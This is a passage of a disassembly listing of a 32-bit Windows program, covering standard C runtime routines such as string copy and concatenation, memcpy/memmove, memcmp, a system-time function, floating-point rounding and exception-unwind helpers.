loc_41F394: ; CODE XREF: sub_41F2C0+F6�j
; sub_41F2C0+10E�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_41F366
loc_41F39E: ; CODE XREF: sub_41F2C0+80�j
; sub_41F2C0+A4�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_41F394
test dl, dl
jz short loc_41F38A
test dh, dh
jz short loc_41F3EA
test edx, 0FF0000h
jz short loc_41F3DA
test edx, 0FF000000h
jnz short loc_41F394
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41F3DA: ; CODE XREF: sub_41F2C0+106�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41F3EA: ; CODE XREF: sub_41F2C0+FE�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_41F2C0 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F400 proc near ; CODE XREF: sub_40AC0D+62�p
; sub_40AC0D+6F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41F420
cmp edi, eax
jb loc_41F59C
loc_41F420: ; CODE XREF: sub_41F400+16�j
test edi, 3
jnz short loc_41F43C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41F45C
rep movsd
jmp off_41F54C[edx*4]
; ---------------------------------------------------------------------------
loc_41F43C: ; CODE XREF: sub_41F400+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41F454
and eax, 3
add ecx, eax
jmp dword ptr loc_41F45C+4[eax*4]
; ---------------------------------------------------------------------------
loc_41F454: ; CODE XREF: sub_41F400+46�j
jmp dword_41F55C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
loc_41F45C: ; CODE XREF: sub_41F400+31�j
; DATA XREF: sub_41F400+4D�r
jmp off_41F4E0[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset dword_41F470
dd offset dword_41F49C
dd offset dword_41F4C0
dword_41F470 dd 68AD123h, 468A0788h, 1478801h, 0C102468Ah, 478802E9h
; DATA XREF: sub_41F400+64�o
dd 3C68302h, 8303C783h, 0CC7208F9h, 24FFA5F3h, 41F54C95h
dd 498D00h
dword_41F49C dd 68AD123h, 468A0788h, 2E9C101h, 83014788h, 0C78302C6h
; DATA XREF: sub_41F400+68�o
dd 8F98302h, 0A5F3A672h, 4C9524FFh, 900041F5h
dword_41F4C0 dd 68AD123h, 0C6830788h, 2E9C101h, 8301C783h, 887208F9h
; DATA XREF: sub_41F400+6C�o
dd 24FFA5F3h, 41F54C95h, 498D00h
off_41F4E0 dd offset byte_41F543 ; DATA XREF: sub_41F400:loc_41F45C�r
dd offset dword_41F530
dd offset dword_41F528
dd offset dword_41F520
dd offset dword_41F518
dd offset dword_41F510
dd offset dword_41F508
dd offset dword_41F500
dword_41F500 dd 0E48E448Bh, 0E48F4489h ; DATA XREF: sub_41F400+FC�o
dword_41F508 dd 0E88E448Bh, 0E88F4489h ; DATA XREF: sub_41F400+F8�o
dword_41F510 dd 0EC8E448Bh, 0EC8F4489h ; DATA XREF: sub_41F400+F4�o
dword_41F518 dd 0F08E448Bh, 0F08F4489h ; DATA XREF: sub_41F400+F0�o
dword_41F520 dd 0F48E448Bh, 0F48F4489h ; DATA XREF: sub_41F400+EC�o
dword_41F528 dd 0F88E448Bh, 0F88F4489h ; DATA XREF: sub_41F400+E8�o
dword_41F530 dd 0FC8E448Bh, 0FC8F4489h, 8D048Dh, 3000000h ; DATA XREF: sub_41F400+E4�o
db 0F0h, 3, 0F8h
byte_41F543 db 0FFh ; DATA XREF: sub_41F400:off_41F4E0�o
dd 0F54C9524h, 0FF8B0041h
off_41F54C dd offset dword_41F55C ; DATA XREF: sub_41F400+35�r
dd offset dword_41F564
dd offset dword_41F570
dd offset dword_41F584
dword_41F55C dd 5E08458Bh ; DATA XREF: sub_41F400:loc_41F454�r
; sub_41F400:off_41F54C�o
dd 90C3C95Fh
dword_41F564 dd 788068Ah, 5E08458Bh, 90C3C95Fh ; DATA XREF: sub_41F400+150�o
dword_41F570 dd 788068Ah, 8801468Ah, 458B0147h, 0C95F5E08h, 498DC3h
; DATA XREF: sub_41F400+154�o
dword_41F584 dd 788068Ah, 8801468Ah, 468A0147h, 2478802h, 5E08458Bh
; DATA XREF: sub_41F400+158�o
dd 90C3C95Fh
; ---------------------------------------------------------------------------
loc_41F59C: ; CODE XREF: sub_41F400+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41F5D0
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41F5C4
std
rep movsd
cld
jmp off_41F6E8[edx*4]
; ---------------------------------------------------------------------------
dw 0FF8Bh
; ---------------------------------------------------------------------------
loc_41F5C4: ; CODE XREF: sub_41F400+1B5�j
neg ecx
jmp off_41F698[ecx*4]
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
; ---------------------------------------------------------------------------
loc_41F5D0: ; CODE XREF: sub_41F400+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41F5E8
and eax, 3
sub ecx, eax
jmp dword ptr loc_41F5E8+4[eax*4]
; ---------------------------------------------------------------------------
loc_41F5E8: ; CODE XREF: sub_41F400+1DA�j
; DATA XREF: sub_41F400+1E1�r
jmp off_41F6E8[ecx*4]
sub_41F400 endp
; ---------------------------------------------------------------------------
db 90h
dd offset dword_41F5FC
dd offset dword_41F620
dd offset dword_41F648
dword_41F5FC dd 2303468Ah, 34788D1h, 0C101EE83h, 0EF8302E9h, 8F98301h
; DATA XREF: seg000:0041F5F0�o
dd 0F3FDB272h, 24FFFCA5h, 41F6E895h, 498D00h
dword_41F620 dd 2303468Ah, 34788D1h, 0C102468Ah, 478802E9h, 2EE8302h
; DATA XREF: seg000:0041F5F4�o
dd 8302EF83h, 887208F9h, 0FCA5F3FDh, 0E89524FFh, 900041F6h
dword_41F648 dd 2303468Ah, 34788D1h, 8802468Ah, 468A0247h, 2E9C101h
; DATA XREF: seg000:0041F5F8�o
dd 83014788h, 0EF8303EEh, 8F98303h, 0FF56820Fh, 0F3FDFFFFh
dd 24FFFCA5h, 41F6E895h, 498D00h, 41F69Ch, 41F6A4h, 41F6ACh
dd 41F6B4h, 41F6BCh, 41F6C4h, 41F6CCh
off_41F698 dd offset byte_41F6DF ; DATA XREF: sub_41F400+1C6�r
dd 1C8E448Bh, 1C8F4489h, 188E448Bh, 188F4489h, 148E448Bh
dd 148F4489h, 108E448Bh, 108F4489h, 0C8E448Bh, 0C8F4489h
dd 88E448Bh, 88F4489h, 48E448Bh, 48F4489h, 8D048Dh, 3000000h
db 0F0h, 3, 0F8h
byte_41F6DF db 0FFh ; DATA XREF: seg000:off_41F698�o
dd 0F6E89524h, 0FF8B0041h
off_41F6E8 dd offset dword_41F6F8 ; DATA XREF: sub_41F400+1BB�r
; sub_41F400:loc_41F5E8�r
dd offset dword_41F700
dd offset dword_41F710
dd offset dword_41F724
dword_41F6F8 dd 5E08458Bh, 90C3C95Fh ; DATA XREF: seg000:off_41F6E8�o
dword_41F700 dd 8803468Ah, 458B0347h, 0C95F5E08h, 498DC3h ; DATA XREF: seg000:0041F6EC�o
dword_41F710 dd 8803468Ah, 468A0347h, 2478802h, 5E08458Bh, 90C3C95Fh
; DATA XREF: seg000:0041F6F0�o
dword_41F724 dd 8803468Ah, 468A0347h, 2478802h, 8801468Ah, 458B0147h
; DATA XREF: seg000:0041F6F4�o
dd 0C95F5E08h
db 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F73D proc near ; CODE XREF: seg000:0040BBFA�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push eax
mov [ebp+var_14], 49h
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_41E1C0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
call sub_423327
add esp, 10h
leave
retn
sub_41F73D endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_41F780 proc near ; CODE XREF: seg000:0040C6A0�p
; seg000:0040C6B7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_41F7D2
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_41F7D3
test eax, 1
jz short loc_41F7B3
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41F800
add esi, 1
add edi, 1
sub eax, 1
jz short loc_41F7D0
loc_41F7B3: ; CODE XREF: sub_41F780+20�j
; sub_41F780+4E�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41F800
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41F800
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41F7B3
loc_41F7D0: ; CODE XREF: sub_41F780+31�j
; sub_41F780+8A�j
pop edi
pop esi
locret_41F7D2: ; CODE XREF: sub_41F780+6�j
retn
; ---------------------------------------------------------------------------
loc_41F7D3: ; CODE XREF: sub_41F780+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_41F808
repe cmpsd
jz short loc_41F808
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_41F7FB
cmp ch, dh
jnz short loc_41F7FB
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_41F7FB
cmp ch, dh
loc_41F7FB: ; CODE XREF: sub_41F780+69�j
; sub_41F780+6D�j ...
mov eax, 0
loc_41F800: ; CODE XREF: sub_41F780+26�j
; sub_41F780+39�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F808: ; CODE XREF: sub_41F780+5B�j
; sub_41F780+5F�j
test eax, eax
jz short loc_41F7D0
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_41F7FB
sub eax, 1
jz short loc_41F835
cmp dh, ch
jnz short loc_41F7FB
sub eax, 1
jz short loc_41F835
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_41F7FB
sub eax, 1
loc_41F835: ; CODE XREF: sub_41F780+97�j
; sub_41F780+A0�j
pop edi
pop esi
retn
sub_41F780 endp
; =============== S U B R O U T I N E =======================================
sub_41F838 proc near ; CODE XREF: sub_40C89B+75�p
; sub_40C89B+85�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp word ptr [eax], 0
mov edx, eax
jz short loc_41F84C
loc_41F844: ; CODE XREF: sub_41F838+12�j
inc edx
inc edx
cmp word ptr [edx], 0
jnz short loc_41F844
loc_41F84C: ; CODE XREF: sub_41F838+A�j
push esi
mov esi, [esp+4+arg_4]
loc_41F851: ; CODE XREF: sub_41F838+26�j
mov cx, [esi]
mov [edx], cx
inc edx
inc edx
inc esi
inc esi
test cx, cx
jnz short loc_41F851
pop esi
retn
sub_41F838 endp
; =============== S U B R O U T I N E =======================================
sub_41F862 proc near ; CODE XREF: seg000:00411260�p
; seg000:004112D1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov edx, [esp+arg_4]
loc_41F86A: ; CODE XREF: sub_41F862+15�j
mov ax, [edx]
mov [ecx], ax
inc ecx
inc ecx
inc edx
inc edx
test ax, ax
jnz short loc_41F86A
mov eax, [esp+arg_0]
retn
sub_41F862 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F87E proc near ; CODE XREF: sub_40E3B2+1CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call ds:dword_42B198 ; GetSystemTimeAsFileTime
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_420C80
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_41F8B5
mov [ecx], eax
locret_41F8B5: ; CODE XREF: sub_41F87E+33�j
leave
retn
sub_41F87E endp
; ---------------------------------------------------------------------------
aB?n db '¡ ?N',0 ; DATA XREF: seg002:0043C018�o
dword_41F8BC dd 6A56C085h, 7755E14h, 200B8h, 3B06EB00h, 8B077DC6h, 3F20A3C6h
dd 46A004Eh, 0D06E850h, 0C0850000h, 8A35959h, 75004E2Fh
dd 56046A1Eh, 3F203589h, 0EDE8004Eh, 8500000Ch, 0A35959C0h
dd 4E2F08h, 1A6A0575h, 33C35E58h, 3500B9D2h, 5EB0044h
dd 4E2F08A1h, 20C8900h, 8320C183h, 0F98104C2h, 443780h
dd 0D233EA7Ch, 443510B9h, 0C1C28B00h, 48B05F8h, 4E2BA085h
dd 83F28B00h, 48B1FE6h, 0FFF883F0h, 0C0850474h, 9830375h
dd 20C183FFh, 70F98142h, 7C004435h, 5EC033D4h, 176AE8C3h
dd 3D800000h, 4E2938h, 0E9057400h, 49C9h, 0CCCCCCC3h, 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F980 proc near ; CODE XREF: sub_40EFAE+4E�p
; sub_4211B3+2DE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41F9A0
cmp edi, eax
jb loc_41FB1C
loc_41F9A0: ; CODE XREF: sub_41F980+16�j
test edi, 3
jnz short loc_41F9BC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41F9DC
rep movsd
jmp off_41FACC[edx*4]
; ---------------------------------------------------------------------------
loc_41F9BC: ; CODE XREF: sub_41F980+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41F9D4
and eax, 3
add ecx, eax
jmp dword ptr loc_41F9DC+4[eax*4]
; ---------------------------------------------------------------------------
loc_41F9D4: ; CODE XREF: sub_41F980+46�j
jmp dword_41FADC[ecx*4]
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
loc_41F9DC: ; CODE XREF: sub_41F980+31�j
; DATA XREF: sub_41F980+4D�r
jmp off_41FA60[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset dword_41F9F0
dd offset dword_41FA1C
dd offset dword_41FA40
dword_41F9F0 dd 68AD123h, 468A0788h, 1478801h, 0C102468Ah, 478802E9h
; DATA XREF: sub_41F980+64�o
dd 3C68302h, 8303C783h, 0CC7208F9h, 24FFA5F3h, 41FACC95h
dd 498D00h
dword_41FA1C dd 68AD123h, 468A0788h, 2E9C101h, 83014788h, 0C78302C6h
; DATA XREF: sub_41F980+68�o
dd 8F98302h, 0A5F3A672h, 0CC9524FFh, 900041FAh
dword_41FA40 dd 68AD123h, 0C6830788h, 2E9C101h, 8301C783h, 887208F9h
; DATA XREF: sub_41F980+6C�o
dd 24FFA5F3h, 41FACC95h, 498D00h
off_41FA60 dd offset byte_41FAC3 ; DATA XREF: sub_41F980:loc_41F9DC�r
dd offset dword_41FAB0
dd offset dword_41FAA8
dd offset dword_41FAA0
dd offset dword_41FA98
dd offset dword_41FA90
dd offset dword_41FA88
dd offset dword_41FA80
dword_41FA80 dd 0E48E448Bh, 0E48F4489h ; DATA XREF: sub_41F980+FC�o
dword_41FA88 dd 0E88E448Bh, 0E88F4489h ; DATA XREF: sub_41F980+F8�o
dword_41FA90 dd 0EC8E448Bh, 0EC8F4489h ; DATA XREF: sub_41F980+F4�o
dword_41FA98 dd 0F08E448Bh, 0F08F4489h ; DATA XREF: sub_41F980+F0�o
dword_41FAA0 dd 0F48E448Bh, 0F48F4489h ; DATA XREF: sub_41F980+EC�o
dword_41FAA8 dd 0F88E448Bh, 0F88F4489h ; DATA XREF: sub_41F980+E8�o
dword_41FAB0 dd 0FC8E448Bh, 0FC8F4489h, 8D048Dh, 3000000h ; DATA XREF: sub_41F980+E4�o
db 0F0h, 3, 0F8h
byte_41FAC3 db 0FFh ; DATA XREF: sub_41F980:off_41FA60�o
dd 0FACC9524h, 0FF8B0041h
off_41FACC dd offset dword_41FADC ; DATA XREF: sub_41F980+35�r
dd offset dword_41FAE4
dd offset dword_41FAF0
dd offset dword_41FB04
dword_41FADC dd 5E08458Bh ; DATA XREF: sub_41F980:loc_41F9D4�r
; sub_41F980:off_41FACC�o
dd 90C3C95Fh
dword_41FAE4 dd 788068Ah, 5E08458Bh, 90C3C95Fh ; DATA XREF: sub_41F980+150�o
dword_41FAF0 dd 788068Ah, 8801468Ah, 458B0147h, 0C95F5E08h, 498DC3h
; DATA XREF: sub_41F980+154�o
dword_41FB04 dd 788068Ah, 8801468Ah, 468A0147h, 2478802h, 5E08458Bh
; DATA XREF: sub_41F980+158�o
dd 90C3C95Fh
; ---------------------------------------------------------------------------
loc_41FB1C: ; CODE XREF: sub_41F980+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41FB50
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41FB44
std
rep movsd
cld
jmp off_41FC68[edx*4]
; ---------------------------------------------------------------------------
dw 0FF8Bh
; ---------------------------------------------------------------------------
loc_41FB44: ; CODE XREF: sub_41F980+1B5�j
neg ecx
jmp off_41FC18[ecx*4]
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
; ---------------------------------------------------------------------------
loc_41FB50: ; CODE XREF: sub_41F980+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41FB68
and eax, 3
sub ecx, eax
jmp dword ptr loc_41FB68+4[eax*4]
; ---------------------------------------------------------------------------
loc_41FB68: ; CODE XREF: sub_41F980+1DA�j
; DATA XREF: sub_41F980+1E1�r
jmp off_41FC68[ecx*4]
sub_41F980 endp
; ---------------------------------------------------------------------------
db 90h
dd offset dword_41FB7C
dd offset dword_41FBA0
dd offset dword_41FBC8
dword_41FB7C dd 2303468Ah, 34788D1h, 0C101EE83h, 0EF8302E9h, 8F98301h
; DATA XREF: seg000:0041FB70�o
dd 0F3FDB272h, 24FFFCA5h, 41FC6895h, 498D00h
dword_41FBA0 dd 2303468Ah, 34788D1h, 0C102468Ah, 478802E9h, 2EE8302h
; DATA XREF: seg000:0041FB74�o
dd 8302EF83h, 887208F9h, 0FCA5F3FDh, 689524FFh, 900041FCh
dword_41FBC8 dd 2303468Ah, 34788D1h, 8802468Ah, 468A0247h, 2E9C101h
; DATA XREF: seg000:0041FB78�o
dd 83014788h, 0EF8303EEh, 8F98303h, 0FF56820Fh, 0F3FDFFFFh
dd 24FFFCA5h, 41FC6895h, 498D00h, 41FC1Ch, 41FC24h, 41FC2Ch
dd 41FC34h, 41FC3Ch, 41FC44h, 41FC4Ch
off_41FC18 dd offset byte_41FC5F ; DATA XREF: sub_41F980+1C6�r
dd 1C8E448Bh, 1C8F4489h, 188E448Bh, 188F4489h, 148E448Bh
dd 148F4489h, 108E448Bh, 108F4489h, 0C8E448Bh, 0C8F4489h
dd 88E448Bh, 88F4489h, 48E448Bh, 48F4489h, 8D048Dh, 3000000h
db 0F0h, 3, 0F8h
byte_41FC5F db 0FFh ; DATA XREF: seg000:off_41FC18�o
dd 0FC689524h, 0FF8B0041h
off_41FC68 dd offset dword_41FC78 ; DATA XREF: sub_41F980+1BB�r
; sub_41F980:loc_41FB68�r
dd offset dword_41FC80
dd offset dword_41FC90
dd offset dword_41FCA4
dword_41FC78 dd 5E08458Bh, 90C3C95Fh ; DATA XREF: seg000:off_41FC68�o
dword_41FC80 dd 8803468Ah, 458B0347h, 0C95F5E08h, 498DC3h ; DATA XREF: seg000:0041FC6C�o
dword_41FC90 dd 8803468Ah, 468A0347h, 2478802h, 5E08458Bh, 90C3C95Fh
; DATA XREF: seg000:0041FC70�o
dword_41FCA4 dd 8803468Ah, 468A0347h, 2478802h, 8801468Ah, 458B0147h
; DATA XREF: seg000:0041FC74�o
dd 0C95F5E08h, 0CCCCCCC3h
; =============== S U B R O U T I N E =======================================
sub_41FCC0 proc near ; CODE XREF: sub_40EEBD+44�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp ds:dword_4E2B90, 0
jz sub_424720
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_41FCF4
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_41FCF4: ; CODE XREF: sub_41FCC0+23�j
lea esp, [esp+8]
jnz sub_424720
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr ds:oword_439410
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr ds:oword_439440
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jnz short loc_41FD82
cmp eax, 3FFh
jl short loc_41FDBA
psllq xmm1, xmm2
cmp eax, 432h
jg short loc_41FD53
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_41FD53: ; CODE XREF: sub_41FCC0+86�j
; sub_41FCC0+E1�j
ucomisd xmm7, xmm7
jnp short loc_41FD7D
mov edx, 3EDh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_424391
add esp, 10h
loc_41FD7D: ; CODE XREF: sub_41FCC0+97�j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_41FD82: ; CODE XREF: sub_41FCC0+74�j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 1
cmp eax, 0BFFh
jl short loc_41FDBD
cmp eax, 0C32h
jg short loc_41FD53
andpd xmm0, oword ptr ds:oword_439400
subsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_41FDBA: ; CODE XREF: sub_41FCC0+7B�j
fldz
retn
; ---------------------------------------------------------------------------
loc_41FDBD: ; CODE XREF: sub_41FCC0+DA�j
cmppd xmm3, oword ptr ds:oword_439430, 1
orpd xmm3, oword ptr ds:oword_439430
andpd xmm3, oword ptr ds:oword_439420
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_41FCC0 endp
; ---------------------------------------------------------------------------
byte_41FDE1 db 0C3h ; DATA XREF: seg002:0044378C�o
; seg002:00443790�o
; =============== S U B R O U T I N E =======================================
sub_41FDE2 proc near ; CODE XREF: sub_41FE1A�p
mov eax, offset sub_424B83
mov ds:off_443A50, eax
mov ds:off_443A54, offset sub_42484B
mov ds:off_443A58, offset sub_4248B0
mov ds:off_443A5C, offset sub_4247F3
mov ds:off_443A60, offset word_424896
mov ds:off_443A64, eax
retn
sub_41FDE2 endp
; =============== S U B R O U T I N E =======================================
sub_41FE1A proc near ; CODE XREF: sub_41F146+D�p
; sub_424C26+21�p
; DATA XREF: ...
arg_0 = dword ptr 4
call sub_41FDE2
call sub_424C26
cmp [esp+arg_0], 0
mov ds:dword_4E294C, eax
jz short loc_41FE35
call sub_424BD4
loc_41FE35: ; CODE XREF: sub_41FE1A+14�j
fnclex
retn
sub_41FE1A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FE38 proc near ; CODE XREF: sub_40EEBD+21�p
; sub_40EEBD+50�p ...
var_20 = dword ptr -20h
var_10 = qword ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
and esp, 0FFFFFFF0h
fld st
fst [esp+20h+var_8]
fistp [esp+20h+var_10]
fild [esp+20h+var_10]
mov edx, [esp+20h+var_8]
mov eax, dword ptr [esp+20h+var_10]
test eax, eax
jz short loc_41FE97
loc_41FE5B: ; CODE XREF: sub_41FE38+69�j
fsubp st(1), st
test edx, edx
jns short loc_41FE7F
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
xor ecx, 80000000h
add ecx, 7FFFFFFFh
adc eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
adc edx, 0
jmp short locret_41FEAB
; ---------------------------------------------------------------------------
loc_41FE7F: ; CODE XREF: sub_41FE38+27�j
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
add ecx, 7FFFFFFFh
sbb eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
sbb edx, 0
jmp short locret_41FEAB
; ---------------------------------------------------------------------------
loc_41FE97: ; CODE XREF: sub_41FE38+21�j
mov edx, dword ptr [esp+20h+var_10+4]
test edx, 7FFFFFFFh
jnz short loc_41FE5B
fstp [esp+20h+var_8]
fstp [esp+20h+var_8]
locret_41FEAB: ; CODE XREF: sub_41FE38+45�j
; sub_41FE38+5D�j
leave
retn
sub_41FE38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41FEAD proc near ; CODE XREF: sub_40EF65+2C�p
; seg000:004104C2�p ...
jmp sub_41E2A1
sub_41FEAD endp
; =============== S U B R O U T I N E =======================================
sub_41FEB2 proc near ; CODE XREF: sub_40F024+55�p
; seg000:00410328�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_41E5A7
pop ecx
pop ecx
retn
sub_41FEB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FEC0 proc near ; CODE XREF: sub_4250FE+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_41FEC0 endp
; ---------------------------------------------------------------------------
db '[ÉÂ',8,0
; =============== S U B R O U T I N E =======================================
sub_41FEF0 proc near ; CODE XREF: sub_424D74+25�p
; sub_424F82+149�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_41FEF0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FEF7 proc near ; CODE XREF: sub_41FFBA+143�p
; sub_4250FE:loc_425121�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_41FF20
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_4298DC ; RtlUnwind
loc_41FF20: ; DATA XREF: sub_41FEF7+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_41FEF7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_425413
add esp, 20h
mov [ebp-4], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
byte_41FF7F db 0FCh ; DATA XREF: sub_420218+1F�o
aLdLh7d db '‹D$',8,'‹H',8,';',0Dh,'Ô7D',0
db 74h, 0Ch, 8Bh
dd 83042444h, 33080448h, 6AC340C0h, 70FF5000h, 0C70FF14h
dd 74FF006Ah, 70FF2024h, 2474FF10h, 545DE820h, 0C4830000h
db 20h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FFBA proc near ; CODE XREF: sub_41FFBA+15B�p
; sub_425165+30�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
